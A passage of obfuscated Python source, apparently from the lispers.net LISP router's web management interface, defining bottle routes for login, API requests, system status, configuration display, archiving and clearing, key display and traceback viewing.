if ( lispconfig . lisp_find_user_account ( I1Ii , o0oOo0Ooo0O ) == False ) :
return ( json . dumps ( iiiI11 ) )
if 26 - 26: I11i . OoooooooOO
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( iiiI11 ) )
if 39 - 39: iII111i - O0 % i11iIiiIii * I1Ii111 . IiII
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( iiiI11 ) )
if 58 - 58: OoO0O00 % i11iIiiIii . iII111i / oO0o
if 84 - 84: iII111i . I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if ( command == "user-account" ) :
if ( lispconfig . lisp_is_user_superuser ( I1Ii ) == False ) :
iiiI11 = [ { "user-account" : [ { "?" : "not-auth" } ] } ]
return ( json . dumps ( iiiI11 ) )
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
O00oooo0O = bottle . request . body . readline ( )
if ( type ( O00oooo0O ) == bytes ) : O00oooo0O = O00oooo0O . decode ( )
if ( O00oooo0O == "" ) :
iiiI11 = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( iiiI11 ) )
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
iiiI11 = json . loads ( O00oooo0O )
if ( command != "" ) :
command = "lisp " + command
else :
command = list ( iiiI11 [ 0 ] . keys ( ) ) [ 0 ]
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
lisp . lisp_ipc_lock . acquire ( )
if ( bottle . request . method == "DELETE" ) :
iiiI11 = lispconfig . lisp_remove_clause_for_api ( iiiI11 )
else :
iiiI11 = lispconfig . lisp_put_clause_for_api ( iiiI11 )
if 95 - 95: I1IiiI + i11iIiiIii
lisp . lisp_ipc_lock . release ( )
return ( json . dumps ( iiiI11 ) )
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
@ bottle . route ( '/lisp/show/api-doc' , method = "get" )
def o0O ( ) :
if ( os . path . exists ( "lispapi.py" ) ) : os . system ( "pydoc lispapi > lispapi.txt" )
if ( os . path . exists ( "lispapi.txt" ) == False ) :
return ( "lispapi.txt file not found" )
if 2 - 2: iIii1I11I1II1 / oO0o + OoO0O00 / OOooOOo
return ( bottle . static_file ( "lispapi.txt" , root = "./" ) )
if 9 - 9: o0oOOo0O0Ooo . ooOoO0o - Oo0Ooo - oO0o + II111iiii * i11iIiiIii
if 79 - 79: oO0o % I11i % I1IiiI
if 5 - 5: OoooooooOO % OoOoOO00 % oO0o % iII111i
if 7 - 7: II111iiii + OoooooooOO . I1Ii111 . ooOoO0o - o0oOOo0O0Ooo
if 26 - 26: Oo0Ooo / IiII % iIii1I11I1II1 / IiII + I11i
@ bottle . route ( '/lisp/show/command-doc' , method = "get" )
def oOO0O00oO0Ooo ( ) :
return ( bottle . static_file ( "lisp.config.example" , root = "./" ,
mimetype = "text/plain" ) )
if 67 - 67: OoO0O00 - OOooOOo
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
@ bottle . route ( '/lisp/show/lisp-xtr' , method = "get" )
def Ii1I1Ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if ( os . path . exists ( "./show-ztr" ) ) :
Oo = open ( "./show-ztr" , "r" ) ; O0OOOOo0O = Oo . read ( ) ; Oo . close ( )
else :
Oo = open ( "./show-xtr" , "r" ) ; O0OOOOo0O = Oo . read ( ) ; Oo . close ( )
if 81 - 81: O0 / OoO0O00 . i1IIi + I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
oooOo0OOOoo0 = ""
O0OOOOo0O = O0OOOOo0O . split ( "\n" )
for OOoO in O0OOOOo0O :
if ( OOoO [ 0 : 4 ] == " " ) : oooOo0OOOoo0 += lisp . lisp_space ( 4 )
if ( OOoO [ 0 : 2 ] == " " ) : oooOo0OOOoo0 += lisp . lisp_space ( 2 )
oooOo0OOOoo0 += OOoO + "<br>"
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
oooOo0OOOoo0 = lisp . convert_font ( oooOo0OOOoo0 )
return ( lisp . lisp_print_sans ( oooOo0OOOoo0 ) )
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
@ bottle . route ( '/lisp/show/<xtr>/keys' , method = "get" )
def OOoOO0o0o0 ( xtr ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 11 - 11: I1IiiI
I1111i = lispconfig . lisp_is_user_superuser ( None )
if 14 - 14: OOooOOo / o0oOOo0O0Ooo
if ( I1111i == False ) :
iIiIIIi = "Permission denied"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 32 - 32: I1IiiI * Oo0Ooo
if 78 - 78: OOooOOo - OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii
if ( xtr not in [ "itr" , "etr" , "rtr" ] ) :
iIiIIIi = "Invalid URL"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 29 - 29: I1IiiI % I1IiiI
Oo0O0 = "show {}-keys" . format ( xtr )
return ( lispconfig . lisp_process_show_command ( Ooo , Oo0O0 ) )
if 82 - 82: II111iiii % I11i / OoO0O00 + OoOoOO00 / o0oOOo0O0Ooo / I1Ii111
if 70 - 70: oO0o
if 59 - 59: o0oOOo0O0Ooo % oO0o
if 6 - 6: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 93 - 93: IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
@ bottle . route ( '/lisp/geo-map/<geo_prefix>' )
def i1I1i111Ii ( geo_prefix ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 67 - 67: I1IiiI . i1IIi
if 27 - 27: ooOoO0o % I1IiiI
geo_prefix = geo_prefix . split ( "-" )
geo_prefix = "-" . join ( geo_prefix [ 0 : - 1 ] ) + "/" + geo_prefix [ - 1 ]
o0oooOO00 = lisp . lisp_geo ( "" )
o0oooOO00 . parse_geo_string ( geo_prefix )
iiIiii1IIIII , o00o = o0oooOO00 . dms_to_decimal ( )
II = o0oooOO00 . radius * 1000
if 7 - 7: I1ii11iIi11i - I1IiiI . iIii1I11I1II1 - i1IIi
o0OOOoO0 = open ( "./lispers.net-geo.html" , "r" ) ; o0OoOo00o0o = o0OOOoO0 . read ( ) ; o0OOOoO0 . close ( )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$LAT" , str ( iiIiii1IIIII ) )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$LON" , str ( o00o ) )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$RADIUS" , str ( II ) )
return ( o0OoOo00o0o )
if 41 - 41: ooOoO0o % OoO0O00 - Oo0Ooo * I1Ii111 * Oo0Ooo
if 69 - 69: OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
@ bottle . route ( '/lisp/login' , method = "get" )
def OOoO0 ( ) :
return ( lispconfig . lisp_login_page ( ) )
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
@ bottle . route ( '/lisp/login' , method = "post" )
def oOoOOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) ) :
return ( lispconfig . lisp_landing_page ( ) )
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
return ( OOoO0 ( ) )
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
@ bottle . route ( '/lisp' )
def OoOoo00Ooo00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 57 - 57: I1Ii111
return ( lispconfig . lisp_landing_page ( ) )
if 32 - 32: Ii1I - Oo0Ooo % OoooooooOO . iII111i / IiII + I1IiiI
if 76 - 76: ooOoO0o
if 73 - 73: O0 * iII111i + Ii1I + ooOoO0o
if 40 - 40: II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
@ bottle . route ( '/lisp/traceback' )
def iiIiIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 39 - 39: I1Ii111
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
iIiii1iI1 = True
if 33 - 33: IiII % iIii1I11I1II1 * I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if ( os . path . exists ( "./logs/lisp-traceback.log" ) ) :
iIiIIIi = getoutput ( "cat ./logs/lisp-traceback.log" )
if ( iIiIIIi ) :
iIiIIIi = iIiIIIi . replace ( "----------" , "<b>----------</b>" )
iIiIIIi = iIiIIIi . replace ( "\n" , "<br>" )
iIiii1iI1 = False
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if ( iIiii1iI1 ) :
iIiIIIi = ""
I1i = "egrep --with-filename Traceback ./logs/*.log"
iIII = getoutput ( I1i )
iIII = iIII . split ( "\n" )
for o0o0O in iIII :
if ( o0o0O . find ( ":" ) == - 1 ) : continue
OOoO = o0o0O . split ( ":" )
if ( OOoO [ 1 ] == "0" ) : continue
iIiIIIi += "Found Tracebacks in log file {}<br>" . format ( OOoO [ 0 ] )
iIiii1iI1 = False
if 68 - 68: ooOoO0o
iIiIIIi = iIiIIIi [ 0 : - 4 ]
if 25 - 25: I1ii11iIi11i . ooOoO0o
if 24 - 24: oO0o / i11iIiiIii + oO0o
if ( iIiii1iI1 ) :
iIiIIIi = "No Tracebacks found - a stable system is a happy system"
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
if 88 - 88: OoOoOO00 / II111iiii
iIiIIIi = lisp . lisp_print_cour ( iIiIIIi )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 87 - 87: I1ii11iIi11i - I1ii11iIi11i - iII111i + oO0o
if 82 - 82: oO0o / iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
@ bottle . route ( '/lisp/show/not-supported' )
def oOoO0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 77 - 77: iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
return ( lispconfig . lisp_not_supported ( ) )
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/status' )
def I1ii11 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
iIiIIIi = ""
I1111i = lispconfig . lisp_is_user_superuser ( None )
if ( I1111i ) :
IiIii1i111 = lisp . lisp_button ( "show configuration" , "/lisp/show/conf" )
iI = lisp . lisp_button ( "show configuration diff" , "/lisp/show/diff" )
o0o00 = lisp . lisp_button ( "archive configuration" , "/lisp/archive/conf" )
IIi = lisp . lisp_button ( "clear configuration" , "/lisp/clear/conf/verify" )
o0o0O = lisp . lisp_button ( "log flows" , "/lisp/log/flows" )
oOoO00oo0O = lisp . lisp_button ( "install LISP software" , "/lisp/install/image" )
IiiiI = lisp . lisp_button ( "restart LISP subsystem" , "/lisp/restart/verify" )
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
iIiIIIi = "<center>{}{}{}{}{}{}{}</center><hr>" . format ( IiIii1i111 , iI , o0o00 , IIi ,
o0o0O , oOoO00oo0O , IiiiI )
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
O00o0OO0000oo = getoutput ( "uptime" )
i1OO0oOOoo = getoutput ( "uname -pv" )
oOOO00o000o = lisp . lisp_version . replace ( "+" , "" )
if 9 - 9: oO0o + I11i / I11i
if 12 - 12: OoooooooOO % o0oOOo0O0Ooo * I11i % iIii1I11I1II1 / Ii1I
if 27 - 27: i11iIiiIii % II111iiii % I11i . O0 - Oo0Ooo + OoOoOO00
if 57 - 57: iIii1I11I1II1 / I11i - i1IIi
if 51 - 51: IiII
ii11I1 = multiprocessing . cpu_count ( )
if 75 - 75: OoO0O00 / II111iiii % O0
Ii111iIi1iIi = O00o0OO0000oo . find ( ", load" )
O00o0OO0000oo = O00o0OO0000oo [ 0 : Ii111iIi1iIi ]
IIIII = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
if 78 - 78: Ii1I * i1IIi
iI11 = "Not available"
if 96 - 96: OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
ooo0O = "ps auww" if lisp . lisp_is_macos ( ) else "ps aux"
iII1iii = "egrep 'PID|python lisp|python -O lisp|python3.8 -O lisp'"
iII1iii += "| egrep -v grep"
i11i1iiiII = getoutput ( "{} | {}" . format ( ooo0O , iII1iii ) )
i11i1iiiII = i11i1iiiII . replace ( " " , lisp . space ( 1 ) )
i11i1iiiII = i11i1iiiII . replace ( "\n" , "<br>" )
if 68 - 68: i11iIiiIii * OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if ( i1OO0oOOoo . find ( "Darwin" ) != - 1 ) :
ii11I1 = old_div ( ii11I1 , 2 )
iI11 = getoutput ( "top -l 1 | head -50" )
iI11 = iI11 . split ( "PID" )
iI11 = iI11 [ 0 ]
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
Ii111iIi1iIi = iI11 . find ( "Load Avg" )
Oooo00 = iI11 [ 0 : Ii111iIi1iIi ] . find ( "threads" )
I111iIi1 = iI11 [ 0 : Oooo00 + 7 ]
iI11 = I111iIi1 + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "CPU usage" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "SharedLibs:" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "MemRegions" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "PhysMem" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "VM:" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "Networks" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "Disks" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
else :
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
O0OOOOo0O = getoutput ( "top -b -n 1 | head -50" )
O0OOOOo0O = O0OOOOo0O . split ( "PID" )
O0OOOOo0O [ 1 ] = O0OOOOo0O [ 1 ] . replace ( " " , lisp . space ( 1 ) )
O0OOOOo0O = O0OOOOo0O [ 0 ] + O0OOOOo0O [ 1 ]
iI11 = O0OOOOo0O . replace ( "\n" , "<br>" )
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = getoutput ( "cat release-notes.txt" )
O0O0Ooooo000 = O0O0Ooooo000 . replace ( "\n" , "<br>" )
if 65 - 65: OOooOOo * I1Ii111
iIiIIIi += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
''' . format ( oOOO00o000o , lisp . lisp_version , o0oO0 , IIIII ,
O00o0OO0000oo , lisp . lisp_space ( 1 ) , ii11I1 , i1OO0oOOoo , i11i1iiiII , iI11 ,
O0O0Ooooo000 )
if 79 - 79: OoooooooOO - I1IiiI
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 69 - 69: I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
@ bottle . route ( '/lisp/show/conf' )
def iI1iIIIi1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 89 - 89: iIii1I11I1II1
return ( bottle . static_file ( "lisp.config" , root = "./" , mimetype = "text/plain" ) )
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
@ bottle . route ( '/lisp/show/diff' )
def IiII1II11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 54 - 54: IiII + O0 + I11i * I1Ii111 - OOooOOo % oO0o
return ( bottle . static_file ( "lisp.config.diff" , root = "./" ,
mimetype = "text/plain" ) )
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
@ bottle . route ( '/lisp/archive/conf' )
def i11i1iiI1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
lisp . lisp_ipc_lock . acquire ( )
os . system ( "cp ./lisp.config ./lisp.config.archive" )
lisp . lisp_ipc_lock . release ( )
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
iIiIIIi = "Configuration file saved to "
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
iIiIIIi += lisp . lisp_print_cour ( "./lisp.config.archive" )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
@ bottle . route ( '/lisp/clear/conf' )
def iI11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
os . system ( "cp ./lisp.config ./lisp.config.before-clear" )
lisp . lisp_ipc_lock . acquire ( )
O0O0oOOo0O ( )
lisp . lisp_ipc_lock . release ( )
if 19 - 19: o0oOOo0O0Ooo / I1Ii111 % o0oOOo0O0Ooo % iII111i * IiII
iIiIIIi = "Configuration cleared, a backup copy is stored in "
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
iIiIIIi += lisp . lisp_print_cour ( "./lisp.config.before-clear" )
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 19 - 19: iIii1I11I1II1
if 26 - 26: OoooooooOO % I1IiiI % Oo0Ooo . I1IiiI % Ii1I
if 34 - 34: IiII / OoOoOO00
if 87 - 87: O0 * o0oOOo0O0Ooo * Oo0Ooo * II111iiii
if 6 - 6: i1IIi . I1ii11iIi11i + OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
@ bottle . route ( '/lisp/clear/conf/verify' )
def ii1Ii1IiIIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( OOoO0 ( ) )
if 83 - 83: I11i / I1ii11iIi11i
if 34 - 34: I1IiiI * Oo0Ooo * I1Ii111 / OoO0O00 * I11i / iIii1I11I1II1
iIiIIIi = "<br>Are you sure you want to clear the configuration?"
iIiIIIi = lisp . lisp_print_sans ( iIiIIIi )
if 74 - 74: Oo0Ooo / i11iIiiIii - II111iiii * o0oOOo0O0Ooo
IIi1IIIIi = lisp . lisp_button ( "yes" , "/lisp/clear/conf" )
OOOoO = lisp . lisp_button ( "cancel" , "/lisp" )
iIiIIIi += IIi1IIIIi + OOOoO + "<br>"
return ( lispconfig . lisp_show_wrapper ( iIiIIIi ) )
if 14 - 14: I11i . iIii1I11I1II1 . OoooooooOO . II111iiii / o0oOOo0O0Ooo
if 21 - 21: i11iIiiIii / i1IIi + I1IiiI * OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
def Oo0oOooo000OO ( ) :
oo00O00oO = ""
if 98 - 98: o0oOOo0O0Ooo + O0 % i1IIi - OOooOOo + Oo0Ooo
for OoOo000oOo0oo in [ "443" , "-8080" , "8080" ] :
oO0O = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep' . format ( OoOo000oOo0oo )
iIiIIIi = getoutput ( oO0O )
if ( iIiIIIi == "" ) : continue
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
iIiIIIi = iIiIIIi . split ( "\n" ) [ 0 ]
iIiIIIi = iIiIIIi . split ( " " )
